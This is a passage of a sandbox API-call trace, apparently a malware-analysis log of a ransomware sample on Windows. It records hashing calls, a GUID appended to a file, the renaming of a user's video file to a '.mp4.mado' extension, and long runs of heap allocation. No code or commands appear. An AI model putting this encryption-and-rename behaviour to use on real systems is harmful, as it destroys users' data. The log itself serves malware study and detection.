pdwDataLen=0x39cfa54) returned 1 [0205.644] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.644] GetLastError () returned 0x0 [0205.644] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.644] CryptReleaseContext (hProv=0x321af0, dwFlags=0x0) returned 1 [0205.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.644] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.644] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.645] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.645] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.645] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x893c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.645] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.645] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.646] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.646] CloseHandle (hObject=0x63c) returned 1 [0205.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b74e80 [0205.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.647] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\O_HU25N0PZDyPsCApD9e.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\o_hu25n0pzdypscapd9e.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\O_HU25N0PZDyPsCApD9e.mp4.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\o_hu25n0pzdypscapd9e.mp4.mado")) returned 1 [0205.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.647] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b2fd8 | out: hHeap=0x2c0000) returned 1 [0205.648] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85d079c0, ftCreationTime.dwHighDateTime=0x1d5e332, ftLastAccessTime.dwLowDateTime=0xb09ca9b0, ftLastAccessTime.dwHighDateTime=0x1d5e5eb, ftLastWriteTime.dwLowDateTime=0xb09ca9b0, ftLastWriteTime.dwHighDateTime=0x1d5e5eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pElYZ7RBZiDz1", cAlternateFileName="PELYZ7~1")) returned 1 [0205.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eed98 [0205.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0205.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eef60 [0205.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0205.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed98 | out: hHeap=0x2c0000) returned 1 [0205.648] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85d079c0, ftCreationTime.dwHighDateTime=0x1d5e332, ftLastAccessTime.dwLowDateTime=0xb09ca9b0, ftLastAccessTime.dwHighDateTime=0x1d5e5eb, ftLastWriteTime.dwLowDateTime=0xb09ca9b0, ftLastWriteTime.dwHighDateTime=0x1d5e5eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pElYZ7RBZiDz1", cAlternateFileName="PELYZ7~1")) returned 0 [0205.648] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0205.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67258 | out: hHeap=0x2c0000) returned 1 [0205.649] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.649] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0205.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0205.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0205.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0205.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.655] 